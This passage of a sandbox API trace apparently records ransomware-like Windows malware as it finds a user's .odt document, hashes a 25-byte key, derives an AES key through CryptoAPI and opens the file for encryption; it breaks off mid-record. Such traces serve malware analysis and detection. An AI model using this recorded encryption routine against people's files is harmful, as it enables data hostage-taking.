lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GvoASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="voASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ASfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SfHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fHILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ILqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lqm4y.odt\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.979] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.979] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0177.979] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0177.979] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.980] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.980] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.980] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.980] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0177.980] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.980] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e07ddb0, ftCreationTime.dwHighDateTime=0x1d5e195, ftLastAccessTime.dwLowDateTime=0x9abbf600, ftLastAccessTime.dwHighDateTime=0x1d5de7f, ftLastWriteTime.dwLowDateTime=0x9abbf600, ftLastWriteTime.dwHighDateTime=0x1d5de7f, nFileSizeHigh=0x0, nFileSizeLow=0x58fc, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="GvoASfHILqm4y.odt", cAlternateFileName="GVOASF~1.ODT")) returned 0x90af58 [0177.980] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0177.980] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.980] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.980] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.980] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.980] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0177.980] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.981] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0177.981] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.981] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.981] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0177.981] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.981] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.981] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.981] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.981] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.981] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0177.981] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.981] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0177.982] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.982] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.982] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0177.982] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.982] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.982] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.982] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.982] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.982] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.982] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.983] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0177.983] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.983] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.983] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.983] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.983] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0177.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.983] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.983] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0177.983] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.989] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.989] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.989] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.989] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.989] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0177.989] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.989] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.989] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.989] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.990] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.990] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.990] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.990] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.990] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.990] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.990] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0177.990] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.990] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.990] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.990] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.990] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0177.990] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.990] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.990] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.990] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.990] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.990] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0177.990] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.990] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.990] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.991] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.991] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.991] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0177.991] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0177.991] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.991] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0177.991] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.991] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.991] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.991] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.991] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.991] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.991] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0177.991] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.991] CryptDestroyHash (hHash=0x90ae18) returned 1 [0177.991] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.991] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.991] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.991] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.991] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.992] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\gvoasfhilqm4y.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0177.993] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.993] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0177.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0177.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0177.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0177.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.993] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0177.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0177.994] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0177.994] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0177.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 